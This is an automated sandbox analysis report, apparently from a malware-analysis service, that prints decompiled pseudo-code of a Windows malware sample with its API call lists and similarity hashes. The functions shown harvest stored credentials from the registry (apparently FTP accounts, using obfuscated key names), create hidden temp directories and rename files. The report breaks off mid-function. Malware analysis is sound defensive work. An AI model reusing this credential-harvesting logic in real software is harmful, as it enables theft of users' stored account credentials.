    • #16.WS2_32(?,?,00000400,00000000), ref: 00414F43
    • #19.WS2_32(?,?,00000000,00000000), ref: 00414F5D
    • #18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00414F9A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID:
    • String ID: Q@
    • API String ID: 0-309375607
    • Opcode ID: 669b38c90977364344fa68dbde67a447bc5ff8cae6e1e766b1292d1272690bfb
    • Instruction ID: 4ed5e21baf27a28e9a33fc1ce4cad0704f5d8dcab4dee7a6c8926cd62f298e29
    • Opcode Fuzzy Hash: 669b38c90977364344fa68dbde67a447bc5ff8cae6e1e766b1292d1272690bfb
    • Instruction Fuzzy Hash: 7E1137B18102289BEB20DF25DD84ADE7BB8FB89350F20446AF91DD3351D7349986CFA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040BC0D(void* __edx) {
    				long _v8;
    				char _v116;
    				void _v220;
    				void* __esi;
    				void* _t8;
    				void* _t12;
    				void* _t18;
    
    				_t18 = __edx;
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
    					if(_t8 != 0 && _v8 == 0x4e) {
    						E0041C9FB(0x2937498d,  &_v116, 0);
    						_t8 = E00411D6F( &_v116,  &_v220, 0x4c);
    						if(_t8 == 0) {
    							_t12 = E0040B81B( &_v220, _t18, 0x422918, _t8);
    							if(_t12 == 0) {
    								return E0040BA86(0x422918, 0);
    							}
    							 *0x423b60 =  *0x423b60 | 0x00000004;
    							return _t12;
    						}
    					}
    				}
    				return _t8;
    			}











    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0040BC17
    • GetThreadDesktop.USER32(00000000), ref: 0040BC1E
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,0041C5C2), ref: 0040BC38
      • Part of subcall function 0040B81B: TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: N
    • API String ID: 454308152-1130791706
    • Opcode ID: 94caacae322e2b563328b01be1e37baa03e5f5028285f365ba9a3b4efdd36237
    • Instruction ID: b1951342a9d2f1b379f158a7c499fd442bad6f30b26e5f35d6b8130eb96e74e5
    • Opcode Fuzzy Hash: 94caacae322e2b563328b01be1e37baa03e5f5028285f365ba9a3b4efdd36237
    • Instruction Fuzzy Hash: E701A770604205AAFB20EFA59D56FAA336CEB00704F40017EF946B31D1DF789A45CBAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407101(WCHAR* __ebx, void* __ecx, char _a4) {
    				void* __edi;
    				void* __esi;
    				long _t3;
    				WCHAR* _t13;
    
    				_t13 = __ebx;
    				if( *0x4223a8 == 0) {
    					E0041CD51(__ecx, 0x4223a8, 0x4225b0, 2);
    					 *((short*)(E00411D3A(0x4225b0, 0x4223a8, E0041284D(0x4223a8) + _t10) + 0x4225b0)) = 0;
    					_t3 = PathRemoveFileSpecW(0x4225b0);
    				}
    				if(_t13 != 0) {
    					E0041209F(_t3 | 0xffffffff, 0x4223a8, _t13);
    					_t3 = PathRenameExtensionW(_t13, L".tmp");
    				}
    				if(_a4 != 0 &&  *0x423dcc > 1) {
    					E00417315(0x4225b0);
    					E0041537F(0x4225b0);
    					_t3 = GetFileAttributesW(0x4223a8);
    					if(_t3 != 0xffffffff) {
    						return E0041537F(0x4223a8);
    					}
    				}
    				return _t3;
    			}








    APIs
    • PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 00407139
    • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,?,?), ref: 00407155
    • GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,00000000,00020000,00407BFB,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,?), ref: 00407178
      • Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
    • String ID: .tmp
    • API String ID: 3627892477-2986845003
    • Opcode ID: 1fe4f782841b6bc58846894f5ba2667a72a9466d1ffad5b01ccc01e22ab20750
    • Instruction ID: 3ae55c7824cd0ad779c477201d9995ee0ce474b89286fe7db70deb23f79f1f09
    • Opcode Fuzzy Hash: 1fe4f782841b6bc58846894f5ba2667a72a9466d1ffad5b01ccc01e22ab20750
    • Instruction Fuzzy Hash: A2F0A230F042107AD22137365D49ABF29595F91724F44463FF825B62F2CBBC5882826E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0041710E(WCHAR* _a4) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t11;
    				void* _t19;
    				void* _t20;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t19 = 0;
    				while(1) {
    					_push(E00413037());
    					_push(L"tmp");
    					_t18 =  &_v1044;
    					_t11 = E004129F1(_t10, 0x104,  &_v1044, L"%s%08x");
    					_t20 = _t20 + 0xc;
    					if(_t11 == 0xffffffff) {
    						goto L6;
    					}
    					if(E00417593(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
    						_t19 = _t19 + 1;
    						if(_t19 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}










    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 00417125
      • Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00417177
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: 8f3245e94b748fc8fc34958ba61d24872ebf0d181fec2e5ebf8f9a1c04083712
    • Instruction ID: 25647cd77b7035d364a82bd953024552736e9361de7969b605218639ad23ac18
    • Opcode Fuzzy Hash: 8f3245e94b748fc8fc34958ba61d24872ebf0d181fec2e5ebf8f9a1c04083712
    • Instruction Fuzzy Hash: 78F0F4F628821476DB206A248C45BEB37699B05754F100132FA51E62E1D27C8ED6969C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417315(WCHAR* _a4) {
    				signed int _t4;
    				short _t9;
    				signed short _t10;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				int _t18;
    
    				_t12 = _a4;
    				_t9 = 0;
    				_t11 = PathSkipRootW(_t12);
    				if(_t11 == 0) {
    					_t11 = _t12;
    				}
    				while(1) {
    					_t4 =  *_t11 & 0x0000ffff;
    					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
    						goto L5;
    					}
    					L11:
    					_t11 =  &(_t11[1]);
    					continue;
    					L5:
    					_t10 = _t4;
    					 *_t11 = 0;
    					if(GetFileAttributesW(_t12) == 0xffffffff) {
    						_t18 = CreateDirectoryW(_t12, 0);
    					}
    					if(_t18 == 0) {
    						L13:
    						return _t9;
    					} else {
    						if(_t10 == 0) {
    							_t9 = 1;
    							goto L13;
    						}
    						 *_t11 = _t10;
    						goto L11;
    					}
    				}
    			}










    APIs
    • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00411520,?,?,?,?,?), ref: 00417320
    • GetFileAttributesW.KERNEL32(?,?,00000000,00411520,?,?,?,?,?), ref: 00417348
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00411520,?,?,?,?,?), ref: 00417356
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AttributesCreateDirectoryFilePathRootSkip
    • String ID: .exe
    • API String ID: 4231520044-4119554291
    • Opcode ID: 05ba98d73cc3fc5f35df1dd188fbee6b26a8c142603325ee16ad39213cebcba3
    • Instruction ID: 3c020cabd657920e8211c973beb599ef1ec31f652935267262497f16ef1b3cf5
    • Opcode Fuzzy Hash: 05ba98d73cc3fc5f35df1dd188fbee6b26a8c142603325ee16ad39213cebcba3
    • Instruction Fuzzy Hash: 63F0FC3558821C56C6300B255C49AFBB3B99E41BA0B651527FDB1D7360D738ACC1F26C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413505(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					return _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(0xffffffff,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}






    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041C2F5,00000000,0041C81E), ref: 00413512
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00413522
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 1646373207-3024904723
    • Opcode ID: fe4f8119948997e644b120d3f83256ffff137e24f1d3dc27fde33818e43c96cd
    • Instruction ID: 2a01c0ad85ca5ef5d5d4dd11bea83a1c2ae38e8da002b0acd0ca78dc835b2ce4
    • Opcode Fuzzy Hash: fe4f8119948997e644b120d3f83256ffff137e24f1d3dc27fde33818e43c96cd
    • Instruction Fuzzy Hash: DAE04831600345B6DF105FA5AD06B9F779C5B11B97F5402A9A411F21D0D6B8DB449928
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E4FB(intOrPtr _a4, intOrPtr _a12) {
    				void* __esi;
    				void* _t6;
    				signed int _t7;
    				intOrPtr _t9;
    
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x422aa4);
    					_t7 = E0040DEC2(_a4);
    					if(_t7 != 0xffffffff) {
    						_t9 =  *0x422abc; // 0x0
    						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
    					}
    					LeaveCriticalSection(0x422aa4);
    					return _t7;
    				}
    				return _t6;
    			}








    APIs
    • EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E511
    • SetEvent.KERNEL32(?), ref: 0040E532
    • LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E539
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    • API String ID: 3094578987-1842515611
    • Opcode ID: 0c5fc4d82de9dc5dc7288d01ef4836a685593fc7398a8f93c7069808be55a682
    • Instruction ID: 06ccc24f6bec2e7c4b9925a03029b0e7aced5ea6c591ae27693f05a05bdf8d2b
    • Opcode Fuzzy Hash: 0c5fc4d82de9dc5dc7288d01ef4836a685593fc7398a8f93c7069808be55a682
    • Instruction Fuzzy Hash: 64E06531100100BFC7246B55ED4886AB764DBD6339705C93FF116B61B0D7388852CA59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0041AFFC(void* __edx, intOrPtr _a4) {
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				signed int _v64;
    				intOrPtr _v74;
    				intOrPtr _v78;
    				char _v80;
    				struct _SYSTEMTIME _v96;
    				char _v112;
    				short _v184;
    				short _v288;
    				void* __ebx;
    				void* __esi;
    				signed int _t127;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t140;
    				signed int _t142;
    				signed int _t143;
    				signed int _t151;
    				signed int _t155;
    				signed int _t159;
    				signed char _t163;
    				signed int _t167;
    				signed int _t176;
    				signed int _t177;
    				signed int _t186;
    				long _t191;
    				long _t195;
    				signed int _t201;
    				void* _t202;
    				signed int _t203;
    				signed int _t208;
    				signed int _t211;
    				signed int _t212;
    				signed int _t219;
    				short* _t230;
    				signed int _t238;
    				intOrPtr _t239;
    				void* _t244;
    
    				_t239 = _a4;
    				_t126 =  *((intOrPtr*)(_t239 + 0x40));
    				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
    					_t127 = E0041787A( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
    					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
    					_t238 = _t127;
    					_v64 = _t238;
    					__eflags = _t238;
    					if(_t238 == 0) {
    						L55:
    						E00411CFE(_v64);
    						__eflags = 0 -  *(_t239 + 0x3c);
    						asm("sbb eax, eax");
    						return  ~0x00000000;
    					}
    					_t131 = _v12;
    					__eflags = _t131 - 0x10;
    					if(_t131 <= 0x10) {
    						goto L55;
    					}
    					__eflags =  *((char*)(_t239 + 0x18)) - 1;
    					_v16 = 1;
    					_t132 = _t131 + _t238;
    					__eflags = _t132;
    					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
    					_v12 = _t132;
    					while(1) {
    						_t133 =  *(_t238 + 2) & 0x0000ffff;
    						__eflags = _t133 - 0x10;
    						if(_t133 < 0x10) {
    							goto L55;
    						}
    						_t219 =  *(_t238 + 4) & 0x0000ffff;
    						__eflags = _t219 - _t133;
    						if(_t219 >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 6) - _t133;
    						if( *(_t238 + 6) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 8) - _t133;
    						if( *(_t238 + 8) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xa) - _t133;
    						if( *(_t238 + 0xa) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xc) - _t133;
    						if( *(_t238 + 0xc) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xe) - _t133;
    						if( *(_t238 + 0xe) >= _t133) {
    							goto L55;
    						}
    						_t134 =  *_t238 & 0x0000ffff;
    						_t208 = _t134 >> 0x00000009 & 0x00000008;
    						_t220 = _t238 + _t219;
    						__eflags = (_t134 & _v28) - _v28;
    						if((_t134 & _v28) != _v28) {
    							L48:
    							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
    							_t102 = _t238 + 0x10; // 0x10
    							__eflags = _t102 - _v12;
    							if(_t102 > _v12) {
    								goto L55;
    							}
    							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
    							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
    								goto L55;
    							}
    							_v16 = _v16 + 1;
    							continue;
    						}
    						_t234 = _t208;
    						_t140 = E0041ACD9(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
    						__eflags = _t140;
    						if(_t140 == 0) {
    							goto L48;
    						}
    						_t141 =  *(_t239 + 0x44);
    						__eflags =  *(_t239 + 0x44);
    						if(__eflags == 0) {
    							L16:
    							_t142 =  *(_t238 + 8) & 0x0000ffff;
    							__eflags = _t142;
    							if(_t142 == 0) {
    								L18:
    								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
    								__eflags = _t143;
    								if(_t143 == 0) {
    									L20:
    									__eflags =  *_t238 & 0x00000010;
    									if(( *_t238 & 0x00000010) == 0) {
    										L31:
    										E00411DB1( &_v60,  &_v60, 0, 0x1c);
    										_v60 =  *_t238 & 0x0000ffff;
    										_t209 = _t208 | 0xffffffff;
    										_v56 = E0041215C(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
    										_t151 =  *(_t238 + 6) & 0x0000ffff;
    										__eflags = _t151;
    										if(_t151 != 0) {
    											__eflags = _t151 + _t238;
    											_v52 = E0041215C(_t209, _t151 + _t238);
    										} else {
    											_v52 = _v52 & 0x00000000;
    										}
    										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
    										__eflags = _t155;
    										if(_t155 != 0) {
    											__eflags = _t155 + _t238;
    											_v48 = E0041215C(_t209, _t155 + _t238);
    										} else {
    											_v48 = _v48 & 0x00000000;
    										}
    										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
    										__eflags = _t159;
    										if(_t159 != 0) {
    											__eflags = _t159 + _t238;
    											_v44 = E0041215C(_t209, _t159 + _t238);
    										} else {
    											_v44 = _v44 & 0x00000000;
    										}
    										_t163 =  *_t238 & 0x0000ffff;
    										__eflags = _t163 & 0x00000003;
    										if((_t163 & 0x00000003) != 0) {
    											E0041BF3C( *(_t239 + 0x3c),  *(_t239 + 0x38));
    											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    											_t167 = E00411D51(__eflags,  &_v60, 0x1c);
    											 *(_t239 + 0x38) = _t167;
    											__eflags = _t167;
    											if(_t167 == 0) {
    												E0041BF13( &_v60);
    												_t239 = _a4;
    											} else {
    												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
    											}
    											goto L55;
    										} else {
    											__eflags = _t163 & 0x0000000c;
    											if(__eflags == 0) {
    												E0041BF13( &_v60);
    												L47:
    												_t239 = _a4;
    												goto L48;
    											}
    											_t211 = E0041787A( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
    											_v40 = _t211;
    											__eflags = _t211;
    											if(_t211 == 0) {
    												L54:
    												E00411CFE(_t211);
    												E0041BF13( &_v60);
    												_t239 = _a4;
    												E0041BF3C( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
    												_t122 = _t239 + 0x3c;
    												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
    												__eflags =  *_t122;
    												goto L55;
    											}
    											_t176 = E00417F4C(_t211, _v36);
    											__eflags = _t176;
    											if(_t176 == 0) {
    												goto L54;
    											}
    											_t177 = E00411C89(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
    											__eflags = _t177;
    											if(_t177 == 0) {
    												goto L54;
    											}
    											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
    											E00411D3A( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
    											goto L47;
    										}
    									}
    									__eflags =  *(_t238 + 0xc);
    									if( *(_t238 + 0xc) <= 0) {
    										goto L31;
    									}
    									E0041CDE0( &_v184, _t220, 1,  &_v288);
    									_t186 = E00412FA3( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E0041283B(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
    									__eflags = _t186;
    									if(_t186 == 0) {
    										goto L48;
    									}
    									_t230 =  &_v184;
    									_t212 = 0;
    									__eflags = 0;
    									do {
    										E00412066( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
    										_t212 = _t212 + 1;
    										_t230 = _t230 + 4;
    										__eflags = _t212 - 0x10;
    									} while (_t212 < 0x10);
    									_v32 = _v32 | 0xffffffff;
    									_t208 = 0x10;
    									 *_t230 = 0;
    									_v24 = _t208;
    									_v20 = 0x80000001;
    									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
    									__eflags = _t191;
    									if(_t191 != 0) {
    										goto L31;
    									}
    									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
    									__eflags = _t195;
    									if(_t195 == 0) {
    										_v32 = _v24;
    									}
    									RegCloseKey(_v20);
    									__eflags = _v32 - _t208;
    									if(_v32 == _t208) {
    										GetLocalTime( &_v96);
    										__eflags = _v74 - _v96.wDay;
    										if(_v74 != _v96.wDay) {
    											goto L31;
    										}
    										__eflags = _v78 - _v96.wMonth;
    										if(_v78 == _v96.wMonth) {
    											goto L48;
    										}
    									}
    									goto L31;
    								}
    								_t220 = _t238 + _t143;
    								_t201 = E0041AD0E(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    								__eflags = _t201;
    								if(_t201 == 0) {
    									goto L48;
    								}
    								goto L20;
    							}
    							_t220 = _t238 + _t142;
    							_t202 = E0041AD0E(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    							__eflags = _t202 - 1;
    							if(_t202 == 1) {
    								goto L48;
    							}
    							goto L18;
    						}
    						_t203 = E0041AF94(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
    						__eflags = _t203;
    						if(_t203 != 0) {
    							goto L48;
    						}
    						goto L16;
    					}
    					goto L55;
    				}
    				return 0;
    			}
























































    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 509d16b84c786ff78fe6fb62e0c80fc8915daf7d3af721bdc1899fa0f5e6883b
    • Instruction ID: 752b20fcf7690d42cce6e4b81d486e263f1a7a1ca85bc05596991188f31d2b8c
    • Opcode Fuzzy Hash: 509d16b84c786ff78fe6fb62e0c80fc8915daf7d3af721bdc1899fa0f5e6883b
    • Instruction Fuzzy Hash: 2FB1A171900219AACB20EF95CC41BFEB7B4FF04304F40455AF961E6691E778E9D5CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040A207(char* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				int _v20;
    				int _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v68;
    				char _v88;
    				char _v108;
    				char _v132;
    				char _v172;
    				short _v260;
    				short _v780;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t65;
    				intOrPtr _t92;
    				int _t104;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				int _t120;
    				void* _t125;
    				void* _t132;
    				void* _t135;
    				void* _t136;
    
    				_t119 = __edx;
    				_t118 = __ecx;
    				_t120 = 0;
    				E00411DB1( &_v32,  &_v32, 0, 8);
    				_t65 = E00411CCE(0xc1c);
    				_v16 = _t65;
    				if(_t65 == 0) {
    					L22:
    					if(_v28 <= _t120) {
    						return E00411CFE(_v32);
    					}
    					return E00407DEB(_t119, _v32, 0xcb);
    				} else {
    					_v36 = _t65 + 0x3fc;
    					_v48 = 0x80000001;
    					_v44 = 0x80000002;
    					E00419897(0x8a,  &_v260);
    					E00419897(0x8b,  &_v88);
    					E00419897(0x8c,  &_v132);
    					E00419897(0x8d,  &_v68);
    					E00419897(0x8e,  &_v108);
    					_v12 = 0;
    					do {
    						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
    							goto L20;
    						}
    						_v24 = _t120;
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
    							L19:
    							RegCloseKey(_v8);
    							goto L20;
    						} else {
    							goto L4;
    						}
    						L17:
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
    							L4:
    							_t122 = _v16;
    							_v24 = _v24 + 1;
    							_t92 = E00415E26(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
    							_v40 = _t92;
    							if(_t92 != 0xffffffff && _t92 != 0) {
    								_t132 = E00415E26(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
    								if(_t132 != 0xffffffff && _t132 != 0) {
    									_t124 = _v36;
    									_t104 = E00415E26(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
    									_v20 = _t104;
    									if(_t104 != 0xffffffff && _t104 != 0 && E0040A14D(_t119, _t124, _t132 + _v40) > 0) {
    										_t125 = E00415EDC(_v8, _t118,  &_v780,  &_v132);
    										if(_t125 < 1 || _t125 > 0xffff) {
    											_t125 = 0x15;
    										}
    										_t134 =  &_v172;
    										_t110 = 0x55;
    										E00419897(_t110,  &_v172);
    										_t112 = _v16;
    										_t118 = _v36;
    										_push(_t125);
    										_push(_t112);
    										_push(_t118);
    										_push(_t112 + 0x1fe);
    										_t119 = 0x311;
    										_t126 = _t118 + 0x1fe;
    										_t115 = E004129F1(_t134, 0x311, _t118 + 0x1fe, _t134);
    										_t136 = _t136 + 0x14;
    										if(_t115 > 0) {
    											_t118 =  &_v32;
    											if(E004120F2(_t115,  &_v32, _t126) != 0) {
    												_v28 = _v28 + 1;
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							_t120 = 0;
    							goto L19;
    						}
    						L20:
    						_v12 = _v12 + 1;
    					} while (_v12 < 2);
    					E00411CFE(_v16);
    					goto L22;
    				}
    			}



































    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040A2AD
    • RegEnumKeyExW.ADVAPI32 ref: 0040A2D8
    • RegCloseKey.ADVAPI32(?), ref: 0040A40E
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • RegEnumKeyExW.ADVAPI32 ref: 0040A3FB
      • Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC
      • Part of subcall function 00415EDC: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040E0D2,?,?), ref: 00415EF4
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 026c56769e706e2c5b252c686298eb3ea189268175a0d9b506bce6560cbcaea2
    • Instruction ID: 65d8f4d98ff6e587a924e3664aaa96960ddf4627192584194a5b697d49cc6222
    • Opcode Fuzzy Hash: 026c56769e706e2c5b252c686298eb3ea189268175a0d9b506bce6560cbcaea2
    • Instruction Fuzzy Hash: 1A516D72D00218ABDB11EBA5DD45AEFB7BCEF44304F10017AE905F3291DB789E858B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040A79B(char* __ecx, void* __eflags) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				int* _v20;
    				intOrPtr _v24;
    				char _v28;
    				char* _v32;
    				char _v40;
    				char _v52;
    				char _v64;
    				char _v76;
    				char _v116;
    				short _v180;
    				short _v700;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t55;
    				int _t81;
    				int _t89;
    				int _t93;
    				void* _t99;
    				intOrPtr _t101;
    				void* _t104;
    				int* _t109;
    				char* _t113;
    				void* _t114;
    				void* _t122;
    
    				_t107 = __ecx;
    				_t109 = 0;
    				E00411DB1( &_v28,  &_v28, 0, 8);
    				_t55 = E00411CCE(0xc1c);
    				_v16 = _t55;
    				if(_t55 == 0) {
    					return _t55;
    				}
    				_v32 = _t55 + 0x3fc;
    				E00419897(0x97,  &_v180);
    				E00419897(0x98,  &_v64);
    				E00419897(0x99,  &_v76);
    				E00419897(0x9a,  &_v52);
    				E00419897(0x9b,  &_v40);
    				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
    					L20:
    					E00411CFE(_v16);
    					if(_v24 <= _t109) {
    						return E00411CFE(_v28);
    					}
